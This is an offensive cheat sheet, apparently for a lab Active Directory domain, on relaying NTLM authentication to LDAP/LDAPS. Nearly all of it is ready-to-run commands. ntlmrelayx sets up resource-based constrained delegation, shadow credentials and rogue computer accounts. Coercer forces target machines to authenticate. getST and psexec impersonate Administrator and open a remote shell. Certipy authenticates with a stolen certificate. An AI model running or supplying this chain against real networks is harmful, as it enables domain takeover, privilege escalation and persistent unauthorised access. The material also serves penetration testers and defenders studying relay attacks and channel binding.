NTLM relay to LDAP turns inbound authentication into directory modification. The highest-value outcomes are RBCD, shadow credentials, adding computers, adding group members, resetting passwords, and writing SPNs.
Check LDAP signing
ldapsearch -LLL -x -H ldap://10.10.10.200 -D "ootw.local\\student" -w 'student' -b "CN=Directory Service,CN=Windows NT,CN=Services,CN=Configuration,DC=ootw,DC=local" "(cn=Directory Service)" ldapServerIntegrity msDS-Other-Settings
Interactive LDAPS relay
ntlmrelayx.py -t ldaps://dc01.ootw.local -i --remove-mic -smb2support
Inside the LDAP shell
help
whoami
add_computer ATTACKER01 Password123!
set_rbcd TARGET01$ ATTACKER01$
Non-interactive RBCD relay
ntlmrelayx.py -t ldaps://dc01.ootw.local --delegate-access --escalate-user 'ATTACKER01$' -smb2support
Trigger machine authentication
coercer coerce -d ootw.local -u student -p 'student' --target 10.10.10.201 --listener 10.10.10.100
RBCD follow-up
getST.py -spn 'cifs/target01.ootw.local' -impersonate Administrator -dc-ip 10.10.10.200 'ootw.local/ATTACKER01$:Password123!'
export KRB5CCNAME=Administrator.ccache
psexec.py -k -no-pass ootw.local/Administrator@target01.ootw.local -dc-ip 10.10.10.200
Shadow credentials relay
ntlmrelayx.py -t ldaps://dc01.ootw.local --shadow-credentials --shadow-target TARGET01$ -smb2support
Shadow credentials follow-up
certipy auth -pfx TARGET01.pfx -domain ootw.local -dc-ip 10.10.10.200
Add computer through relay
ntlmrelayx.py -t ldaps://dc01.ootw.local --add-computer 'ATTACKER02$' 'Password123!' -smb2support
Notes
Relay to LDAP is usually more valuable than relay to SMB because the result can become a durable AD primitive rather than a single shell.
LDAPS can still be relayable when channel binding is not enforced. If channel binding is required, many LDAPS relay paths fail.